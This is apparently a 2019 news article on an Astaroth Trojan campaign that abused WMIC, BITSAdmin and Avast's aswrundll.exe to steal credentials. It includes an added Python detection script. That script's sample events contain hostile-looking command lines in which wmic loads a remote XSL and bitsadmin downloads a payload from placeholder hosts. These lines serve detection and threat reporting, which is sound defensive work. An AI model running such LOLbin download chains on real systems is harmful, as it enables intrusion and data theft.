Astaroth Trojan relies on legitimate os and antivirus processes to steal data

Pierluigi Paganini February 16, 2019

A new Astaroth Trojan campaign was spotted by Cybereason’s Nocturnus team; the attackers are targeting Brazil and European countries.

Researchers at Cybereason’s Nocturnus team have uncovered a new Astaroth Trojan campaign that is currently exploiting the Avast antivirus and security software developed by GAS Tecnologia to steal information and drop malicious modules.

“The campaign exploits legitimate operating system processes as well as security vendor products from companies like Avast and GAS Tecnologia to gain information about the target machine and steal password information, as well as keystate information and clipboard usage.” reads the analysis published by Cybereason.

The Astaroth Trojan was first spotted by security firm Cofense in late 2018, when it was involved in a campaign targeting Europe and Brazil. The malware abused living-off-the-land binaries (LOLbins) such as the command-line interface of the Windows Management Instrumentation Console (WMIC) to download and install malicious payloads in the background. According to the experts, LOLbins are very effective at evading antivirus software.

The new strain analyzed by Cybereason leverages the BITSAdmin and WMIC utilities to connect to the command and control infrastructure and download the malicious payload.

BITSAdmin is a command-line tool that can be used to create download or upload jobs and monitor their progress.

This Astaroth Trojan is distributed through spam campaigns; the malicious messages either carry a .7zip file as an attachment or include a hyperlink that points to the archive.

The .7zip archive contains a .lnk file which will instantiate a wmic.exe process that will “initialize an XSL Script Processing attack.”

The malware uses BITSAdmin to fetch a payload from another command and control server; the payload is disguised as images or as files without extensions and contains various Astaroth modules.

Astaroth Trojan

The malware also injects a malicious module into aswrundll.exe (the Avast Software Runtime Dynamic Link Library) used by the Avast antivirus. This code is used to gather information about the compromised system and to load extra modules.
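As an added illustration (not code from the article or from Cybereason), the following Python triage script applies the detection logic implied by the chain above to constructed process-creation events: wmic.exe fetching a remote XSL, bitsadmin.exe downloading from a URL, and aswrundll.exe running from outside the Avast install directory or under a LOLbin parent. The Avast install path, the event field layout and all hostnames are assumptions.

```python
import ntpath
import re

# Constructed sample process-creation events (parent image name, full image path,
# command line), in the shape a SIEM might export. They are not taken from the
# article or from Cybereason's report; the hostnames are placeholders.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic os get /format:"http://example.invalid/stage.xsl"'},
    {"parent": "cmd.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download http://example.invalid/pic.jpg C:\Users\Public\pic.jpg"},
    {"parent": "wmic.exe", "image": r"C:\Users\Public\aswrundll.exe",
     "cmdline": r"C:\Users\Public\aswrundll.exe C:\Users\Public\module.bin"},
    {"parent": "services.exe", "image": r"C:\Program Files\Avast Software\Avast\aswrundll.exe",
     "cmdline": r'"C:\Program Files\Avast Software\Avast\aswrundll.exe"'},
    {"parent": "cmd.exe", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic process list brief"},
]

# wmic's /format: switch pointing at a URL is the "XSL Script Processing" pattern.
REMOTE_XSL = re.compile(r'/format:\s*"?\s*(?:https?|ftp)://', re.IGNORECASE)
# bitsadmin creating or populating a job that pulls from a remote URL.
BITS_REMOTE = re.compile(r'/(?:transfer|addfile)\b.*\b(?:https?|ftp)://', re.IGNORECASE)
# Assumed default location of Avast's own aswrundll.exe (lower-cased for comparison).
AVAST_DIR = r"c:\program files\avast software\avast"
# Script hosts and LOLbins that should not normally spawn an antivirus runtime.
SUSPICIOUS_PARENTS = {"wmic.exe", "cmd.exe", "powershell.exe", "bitsadmin.exe",
                      "mshta.exe", "cscript.exe", "wscript.exe"}


def classify(event):
    """Return the rule name an event matches, or None when it looks benign."""
    name = ntpath.basename(event["image"]).lower()
    cmd = event["cmdline"]
    if name == "wmic.exe" and REMOTE_XSL.search(cmd):
        return "wmic_remote_xsl"
    if name == "bitsadmin.exe" and BITS_REMOTE.search(cmd):
        return "bitsadmin_remote_download"
    if name == "aswrundll.exe":
        # A copy of the Avast runtime outside its install dir, or one launched by a
        # LOLbin, matches the "Avast file used to run a binary" abuse described above.
        outside_install_dir = ntpath.dirname(event["image"]).lower() != AVAST_DIR
        if outside_install_dir or event["parent"].lower() in SUSPICIOUS_PARENTS:
            return "aswrundll_abuse"
    return None


def analyze(events):
    """Return (rule, image path) pairs for every event that matches a rule."""
    return [(classify(e), e["image"]) for e in events if classify(e)]


if __name__ == "__main__":
    for rule, image in analyze(SAMPLE_EVENTS):
        print(f"{rule:28} {image}")
```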

The choice of Avast is effective because the Avast engine is the most common antivirus in the world. Avast pointed out that this is neither injection nor privilege escalation: the attackers are using an Avast file to run a binary, much as a DLL can be run through Windows’ rundll32.exe. Avast has issued a detection for the malware and plans to implement changes to its environment to ensure the same process cannot be misused in this way in the future.

The Astaroth Trojan sample analyzed by the experts also exploits the unins000.exe process of a security solution developed by GAS Tecnologia.

The malware is able to log the users’ keystrokes, collect information through hooking, access clipboard content, and monitor the keystate.

The Astaroth Trojan also uses the NetPass free network password recovery tool to collect login passwords of remote computers on the LAN, passwords of mail accounts on an exchange server stored by Microsoft Outlook, and passwords of MSN Messenger and Windows Messenger accounts.

“Part of the difficulty identifying this attack is in how it evades detection. It is difficult to catch, even for security teams aware of the complications ensuring a secure system, as with our customer above.” concludes Cybereason.

“LOLbins are deceptive because their execution seems benign at first, or even sometimes safe, as with the malicious use of antivirus software. As the use of LOLbins becomes more commonplace, we suspect this complex method of attack will become more common as well. The potential for damage will grow as attackers will look to other more destructive payloads.”


Pierluigi Paganini

(SecurityAffairs – Astaroth Trojan, hacking)
